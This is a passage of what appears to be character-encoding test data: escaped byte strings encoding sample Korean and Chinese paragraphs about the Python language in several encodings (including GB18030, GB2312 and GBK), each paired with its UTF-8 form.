"\xc0\xcc\xbd\xe3\xc0\xbb\x20\xbd\xba\xc5\xa9\xb8\xb3\xc6\xc3\xb0"
"\xfa\x20\xbf\xa9\xb7\xaf\x20\xba\xd0\xbe\xdf\xbf\xa1\xbc\xad\xbf"
"\xcd\x20\xb4\xeb\xba\xce\xba\xd0\xc0\xc7\x20\xc7\xc3\xb7\xa7\xc6"
"\xfb\xbf\xa1\xbc\xad\xc0\xc7\x20\xba\xfc\xb8\xa5\x0a\xbe\xd6\xc7"
"\xc3\xb8\xae\xc4\xc9\xc0\xcc\xbc\xc7\x20\xb0\xb3\xb9\xdf\xc0\xbb"
"\x20\xc7\xd2\x20\xbc\xf6\x20\xc0\xd6\xb4\xc2\x20\xc0\xcc\xbb\xf3"
"\xc0\xfb\xc0\xce\x20\xbe\xf0\xbe\xee\xb7\xce\x20\xb8\xb8\xb5\xe9"
"\xbe\xee\xc1\xdd\xb4\xcf\xb4\xd9\x2e\x0a\x0a\xa1\xd9\xc3\xb9\xb0"
"\xa1\xb3\xa1\x3a\x20\xb3\xaf\xbe\xc6\xb6\xf3\x20\xa4\xd4\xa4\xb6"
"\xa4\xd0\xa4\xd4\xa4\xd4\xa4\xb6\xa4\xd0\xa4\xd4\xbe\xb1\x7e\x20"
"\xa4\xd4\xa4\xa4\xa4\xd2\xa4\xb7\xc5\xad\x21\x20\xa4\xd4\xa4\xa8"
"\xa4\xd1\xa4\xb7\xb1\xdd\xbe\xf8\xc0\xcc\x20\xc0\xfc\xa4\xd4\xa4"
"\xbe\xa4\xc8\xa4\xb2\xb4\xcf\xb4\xd9\x2e\x20\xa4\xd4\xa4\xb2\xa4"
"\xce\xa4\xaa\x2e\x20\xb1\xd7\xb7\xb1\xb0\xc5\x20\xa4\xd4\xa4\xb7"
"\xa4\xd1\xa4\xb4\xb4\xd9\x2e\x0a",
"\xe2\x97\x8e\x20\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\x28\x50\x79"
"\x74\x68\x6f\x6e\x29\xec\x9d\x80\x20\xeb\xb0\xb0\xec\x9a\xb0\xea"
"\xb8\xb0\x20\xec\x89\xbd\xea\xb3\xa0\x2c\x20\xea\xb0\x95\xeb\xa0"
"\xa5\xed\x95\x9c\x20\xed\x94\x84\xeb\xa1\x9c\xea\xb7\xb8\xeb\x9e"
"\x98\xeb\xb0\x8d\x20\xec\x96\xb8\xec\x96\xb4\xec\x9e\x85\xeb\x8b"
"\x88\xeb\x8b\xa4\x2e\x20\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\xec"
"\x9d\x80\x0a\xed\x9a\xa8\xec\x9c\xa8\xec\xa0\x81\xec\x9d\xb8\x20"
"\xea\xb3\xa0\xec\x88\x98\xec\xa4\x80\x20\xeb\x8d\xb0\xec\x9d\xb4"
"\xed\x84\xb0\x20\xea\xb5\xac\xec\xa1\xb0\xec\x99\x80\x20\xea\xb0"
"\x84\xeb\x8b\xa8\xed\x95\x98\xec\xa7\x80\xeb\xa7\x8c\x20\xed\x9a"
"\xa8\xec\x9c\xa8\xec\xa0\x81\xec\x9d\xb8\x20\xea\xb0\x9d\xec\xb2"
"\xb4\xec\xa7\x80\xed\x96\xa5\xed\x94\x84\xeb\xa1\x9c\xea\xb7\xb8"
"\xeb\x9e\x98\xeb\xb0\x8d\xec\x9d\x84\x0a\xec\xa7\x80\xec\x9b\x90"
"\xed\x95\xa9\xeb\x8b\x88\xeb\x8b\xa4\x2e\x20\xed\x8c\x8c\xec\x9d"
"\xb4\xec\x8d\xac\xec\x9d\x98\x20\xec\x9a\xb0\xec\x95\x84\x28\xe5"
"\x84\xaa\xe9\x9b\x85\x29\xed\x95\x9c\x20\xeb\xac\xb8\xeb\xb2\x95"
"\xea\xb3\xbc\x20\xeb\x8f\x99\xec\xa0\x81\x20\xed\x83\x80\xec\x9d"
"\xb4\xed\x95\x91\x2c\x20\xea\xb7\xb8\xeb\xa6\xac\xea\xb3\xa0\x20"
"\xec\x9d\xb8\xed\x84\xb0\xed\x94\x84\xeb\xa6\xac\xed\x8c\x85\x0a"
"\xed\x99\x98\xea\xb2\xbd\xec\x9d\x80\x20\xed\x8c\x8c\xec\x9d\xb4"
"\xec\x8d\xac\xec\x9d\x84\x20\xec\x8a\xa4\xed\x81\xac\xeb\xa6\xbd"
"\xed\x8c\x85\xea\xb3\xbc\x20\xec\x97\xac\xeb\x9f\xac\x20\xeb\xb6"
"\x84\xec\x95\xbc\xec\x97\x90\xec\x84\x9c\xec\x99\x80\x20\xeb\x8c"
"\x80\xeb\xb6\x80\xeb\xb6\x84\xec\x9d\x98\x20\xed\x94\x8c\xeb\x9e"
"\xab\xed\x8f\xbc\xec\x97\x90\xec\x84\x9c\xec\x9d\x98\x20\xeb\xb9"
"\xa0\xeb\xa5\xb8\x0a\xec\x95\xa0\xed\x94\x8c\xeb\xa6\xac\xec\xbc"
"\x80\xec\x9d\xb4\xec\x85\x98\x20\xea\xb0\x9c\xeb\xb0\x9c\xec\x9d"
"\x84\x20\xed\x95\xa0\x20\xec\x88\x98\x20\xec\x9e\x88\xeb\x8a\x94"
"\x20\xec\x9d\xb4\xec\x83\x81\xec\xa0\x81\xec\x9d\xb8\x20\xec\x96"
"\xb8\xec\x96\xb4\xeb\xa1\x9c\x20\xeb\xa7\x8c\xeb\x93\xa4\xec\x96"
"\xb4\xec\xa4\x8d\xeb\x8b\x88\xeb\x8b\xa4\x2e\x0a\x0a\xe2\x98\x86"
"\xec\xb2\xab\xea\xb0\x80\xeb\x81\x9d\x3a\x20\xeb\x82\xa0\xec\x95"
"\x84\xeb\x9d\xbc\x20\xec\x93\x94\xec\x93\x94\xec\x93\xa9\x7e\x20"
"\xeb\x8b\x81\xed\x81\xbc\x21\x20\xeb\x9c\xbd\xea\xb8\x88\xec\x97"
"\x86\xec\x9d\xb4\x20\xec\xa0\x84\xed\x99\xa5\xeb\x8b\x88\xeb\x8b"
"\xa4\x2e\x20\xeb\xb7\x81\x2e\x20\xea\xb7\xb8\xeb\x9f\xb0\xea\xb1"
"\xb0\x20\xec\x9d\x8e\xeb\x8b\xa4\x2e\x0a"),
'gb18030': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\xc8\xe7\xba\xce\xd4\xda\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xd6\xd0\xca\xb9\xd3\xc3\xbc\xc8\xd3\xd0\xb5\xc4\x20\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xa1\xa1\xd4\xda\xd9\x59\xd3"
"\x8d\xbf\xc6\xbc\xbc\xbf\xec\xcb\xd9\xb0\x6c\xd5\xb9\xb5\xc4\xbd"
"\xf1\xcc\xec\x2c\x20\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xdc"
"\x9b\xf3\x77\xb5\xc4\xcb\xd9\xb6\xc8\xca\xc7\xb2\xbb\xc8\xdd\xba"
"\xf6\xd2\x95\xb5\xc4\x0a\xd5\x6e\xee\x7d\x2e\x20\x9e\xe9\xbc\xd3"
"\xbf\xec\xe9\x5f\xb0\x6c\xbc\xb0\x9c\x79\xd4\x87\xb5\xc4\xcb\xd9"
"\xb6\xc8\x2c\x20\xce\xd2\x82\x83\xb1\xe3\xb3\xa3\xcf\xa3\xcd\xfb"
"\xc4\xdc\xc0\xfb\xd3\xc3\xd2\xbb\xd0\xa9\xd2\xd1\xe9\x5f\xb0\x6c"
"\xba\xc3\xb5\xc4\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\x81\x4b"
"\xd3\xd0\xd2\xbb\x82\x80\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74"
"\x6f\x74\x79\x70\x69\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72"
"\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20"
"\xbf\xc9\x0a\xb9\xa9\xca\xb9\xd3\xc3\x2e\x20\xc4\xbf\xc7\xb0\xd3"
"\xd0\xd4\x53\xd4\x53\xb6\xe0\xb6\xe0\xb5\xc4\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xca\xc7\xd2\xd4\x20\x43\x20\x8c\x91\xb3\xc9\x2c"
"\x20\xb6\xf8\x20\x50\x79\x74\x68\x6f\x6e\x20\xca\xc7\xd2\xbb\x82"
"\x80\x0a\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69"
"\x6e\x67\x20\xb5\xc4\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e"
"\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xb9\xca\xce\xd2"
"\x82\x83\xcf\xa3\xcd\xfb\xc4\xdc\x8c\xa2\xbc\xc8\xd3\xd0\xb5\xc4"
"\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xc4\xc3\xb5\xbd\x20"
"\x50\x79\x74\x68\x6f\x6e\x20\xb5\xc4\xad\x68\xbe\xb3\xd6\xd0\x9c"
"\x79\xd4\x87\xbc\xb0\xd5\xfb\xba\xcf\x2e\x20\xc6\xe4\xd6\xd0\xd7"
"\xee\xd6\xf7\xd2\xaa\xd2\xb2\xca\xc7\xce\xd2\x82\x83\xcb\xf9\x0a"
"\xd2\xaa\xd3\x91\xd5\x93\xb5\xc4\x86\x96\xee\x7d\xbe\xcd\xca\xc7"
"\x3a\x0a\x83\x35\xc7\x31\x83\x33\x9a\x33\x83\x32\xb1\x31\x83\x33"
"\x95\x31\x20\x82\x37\xd1\x36\x83\x30\x8c\x34\x83\x36\x84\x33\x20"
"\x82\x38\x89\x35\x82\x38\xfb\x36\x83\x33\x95\x35\x20\x83\x33\xd5"
"\x31\x82\x39\x81\x35\x20\x83\x30\xfd\x39\x83\x33\x86\x30\x20\x83"
"\x34\xdc\x33\x83\x35\xf6\x37\x83\x35\x97\x35\x20\x83\x35\xf9\x35"
"\x83\x30\x91\x39\x82\x38\x83\x39\x82\x39\xfc\x33\x83\x30\xf0\x34"
"\x20\x83\x32\xeb\x39\x83\x32\xeb\x35\x82\x39\x83\x39\x2e\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\xe5"
"\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89\xe7"
"\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3\x80"
"\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a\x80"
"\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84\xe4"
"\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f\x8a"
"\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84\xe9"
"\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5\xbf"
"\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e\x20"
"\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc\xe5"
"\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5\xba"
"\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4\xb8"
"\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5\xbd"
"\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8\xa6"
"\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7\x94"
"\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1\xe8"
"\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62\x72"
"\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf\xab"
"\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e\x20"
"\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20\x70"
"\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20\x70"
"\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75"
"\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5\xb8"
"\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6\x8b"
"\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84\xe7"
"\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5\x8f"
"\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad\xe6"
"\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6\x88"
"\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8\xab"
"\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98\xaf"
"\x3a\x0a\xed\x8c\x8c\xec\x9d\xb4\xec\x8d\xac\xec\x9d\x80\x20\xea"
"\xb0\x95\xeb\xa0\xa5\xed\x95\x9c\x20\xea\xb8\xb0\xeb\x8a\xa5\xec"
"\x9d\x84\x20\xec\xa7\x80\xeb\x8b\x8c\x20\xeb\xb2\x94\xec\x9a\xa9"
"\x20\xec\xbb\xb4\xed\x93\xa8\xed\x84\xb0\x20\xed\x94\x84\xeb\xa1"
"\x9c\xea\xb7\xb8\xeb\x9e\x98\xeb\xb0\x8d\x20\xec\x96\xb8\xec\x96"
"\xb4\xeb\x8b\xa4\x2e\x0a\x0a"),
'gb2312': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
"\xd3\xef\xd1\xd4\xb5\xc4\xcf\xe0\xb9\xd8\xbc\xbc\xca\xf5\xd5\xfd"
"\xd4\xda\xb7\xc9\xcb\xd9\xb5\xc4\xb7\xa2\xd5\xb9\xa3\xac\xd3\xc3"
"\xbb\xa7\xca\xfd\xc1\xbf\xbc\xb1\xbe\xe7\xc0\xa9\xb4\xf3\xa3\xac"
"\xcf\xe0\xb9\xd8\xb5\xc4\xd7\xca\xd4\xb4\xb7\xc7\xb3\xa3\xb6\xe0"
"\xa1\xa3\x0a\x0a",
"\x50\x79\x74\x68\x6f\x6e\xef\xbc\x88\xe6\xb4\xbe\xe6\xa3\xae\xef"
"\xbc\x89\xe8\xaf\xad\xe8\xa8\x80\xe6\x98\xaf\xe4\xb8\x80\xe7\xa7"
"\x8d\xe5\x8a\x9f\xe8\x83\xbd\xe5\xbc\xba\xe5\xa4\xa7\xe8\x80\x8c"
"\xe5\xae\x8c\xe5\x96\x84\xe7\x9a\x84\xe9\x80\x9a\xe7\x94\xa8\xe5"
"\x9e\x8b\xe8\xae\xa1\xe7\xae\x97\xe6\x9c\xba\xe7\xa8\x8b\xe5\xba"
"\x8f\xe8\xae\xbe\xe8\xae\xa1\xe8\xaf\xad\xe8\xa8\x80\xef\xbc\x8c"
"\x0a\xe5\xb7\xb2\xe7\xbb\x8f\xe5\x85\xb7\xe6\x9c\x89\xe5\x8d\x81"
"\xe5\xa4\x9a\xe5\xb9\xb4\xe7\x9a\x84\xe5\x8f\x91\xe5\xb1\x95\xe5"
"\x8e\x86\xe5\x8f\xb2\xef\xbc\x8c\xe6\x88\x90\xe7\x86\x9f\xe4\xb8"
"\x94\xe7\xa8\xb3\xe5\xae\x9a\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d"
"\xe8\xaf\xad\xe8\xa8\x80\xe5\x85\xb7\xe6\x9c\x89\xe9\x9d\x9e\xe5"
"\xb8\xb8\xe7\xae\x80\xe6\x8d\xb7\xe8\x80\x8c\xe6\xb8\x85\xe6\x99"
"\xb0\x0a\xe7\x9a\x84\xe8\xaf\xad\xe6\xb3\x95\xe7\x89\xb9\xe7\x82"
"\xb9\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\xae\x8c\xe6\x88\x90"
"\xe5\x90\x84\xe7\xa7\x8d\xe9\xab\x98\xe5\xb1\x82\xe4\xbb\xbb\xe5"
"\x8a\xa1\xef\xbc\x8c\xe5\x87\xa0\xe4\xb9\x8e\xe5\x8f\xaf\xe4\xbb"
"\xa5\xe5\x9c\xa8\xe6\x89\x80\xe6\x9c\x89\xe7\x9a\x84\xe6\x93\x8d"
"\xe4\xbd\x9c\xe7\xb3\xbb\xe7\xbb\x9f\xe4\xb8\xad\x0a\xe8\xbf\x90"
"\xe8\xa1\x8c\xe3\x80\x82\xe8\xbf\x99\xe7\xa7\x8d\xe8\xaf\xad\xe8"
"\xa8\x80\xe7\xae\x80\xe5\x8d\x95\xe8\x80\x8c\xe5\xbc\xba\xe5\xa4"
"\xa7\xef\xbc\x8c\xe9\x80\x82\xe5\x90\x88\xe5\x90\x84\xe7\xa7\x8d"
"\xe4\xba\xba\xe5\xa3\xab\xe5\xad\xa6\xe4\xb9\xa0\xe4\xbd\xbf\xe7"
"\x94\xa8\xe3\x80\x82\xe7\x9b\xae\xe5\x89\x8d\xef\xbc\x8c\xe5\x9f"
"\xba\xe4\xba\x8e\xe8\xbf\x99\x0a\xe7\xa7\x8d\xe8\xaf\xad\xe8\xa8"
"\x80\xe7\x9a\x84\xe7\x9b\xb8\xe5\x85\xb3\xe6\x8a\x80\xe6\x9c\xaf"
"\xe6\xad\xa3\xe5\x9c\xa8\xe9\xa3\x9e\xe9\x80\x9f\xe7\x9a\x84\xe5"
"\x8f\x91\xe5\xb1\x95\xef\xbc\x8c\xe7\x94\xa8\xe6\x88\xb7\xe6\x95"
"\xb0\xe9\x87\x8f\xe6\x80\xa5\xe5\x89\xa7\xe6\x89\xa9\xe5\xa4\xa7"
"\xef\xbc\x8c\xe7\x9b\xb8\xe5\x85\xb3\xe7\x9a\x84\xe8\xb5\x84\xe6"
"\xba\x90\xe9\x9d\x9e\xe5\xb8\xb8\xe5\xa4\x9a\xe3\x80\x82\x0a\x0a"),
'gbk': (
"\x50\x79\x74\x68\x6f\x6e\xa3\xa8\xc5\xc9\xc9\xad\xa3\xa9\xd3\xef"
"\xd1\xd4\xca\xc7\xd2\xbb\xd6\xd6\xb9\xa6\xc4\xdc\xc7\xbf\xb4\xf3"
"\xb6\xf8\xcd\xea\xc9\xc6\xb5\xc4\xcd\xa8\xd3\xc3\xd0\xcd\xbc\xc6"
"\xcb\xe3\xbb\xfa\xb3\xcc\xd0\xf2\xc9\xe8\xbc\xc6\xd3\xef\xd1\xd4"
"\xa3\xac\x0a\xd2\xd1\xbe\xad\xbe\xdf\xd3\xd0\xca\xae\xb6\xe0\xc4"
"\xea\xb5\xc4\xb7\xa2\xd5\xb9\xc0\xfa\xca\xb7\xa3\xac\xb3\xc9\xca"
"\xec\xc7\xd2\xce\xc8\xb6\xa8\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1"
"\xd4\xbe\xdf\xd3\xd0\xb7\xc7\xb3\xa3\xbc\xf2\xbd\xdd\xb6\xf8\xc7"
"\xe5\xce\xfa\x0a\xb5\xc4\xd3\xef\xb7\xa8\xcc\xd8\xb5\xe3\xa3\xac"
"\xca\xca\xba\xcf\xcd\xea\xb3\xc9\xb8\xf7\xd6\xd6\xb8\xdf\xb2\xe3"
"\xc8\xce\xce\xf1\xa3\xac\xbc\xb8\xba\xf5\xbf\xc9\xd2\xd4\xd4\xda"
"\xcb\xf9\xd3\xd0\xb5\xc4\xb2\xd9\xd7\xf7\xcf\xb5\xcd\xb3\xd6\xd0"
"\x0a\xd4\xcb\xd0\xd0\xa1\xa3\xd5\xe2\xd6\xd6\xd3\xef\xd1\xd4\xbc"
"\xf2\xb5\xa5\xb6\xf8\xc7\xbf\xb4\xf3\xa3\xac\xca\xca\xba\xcf\xb8"
"\xf7\xd6\xd6\xc8\xcb\xca\xbf\xd1\xa7\xcf\xb0\xca\xb9\xd3\xc3\xa1"
"\xa3\xc4\xbf\xc7\xb0\xa3\xac\xbb\xf9\xd3\xda\xd5\xe2\x0a\xd6\xd6"
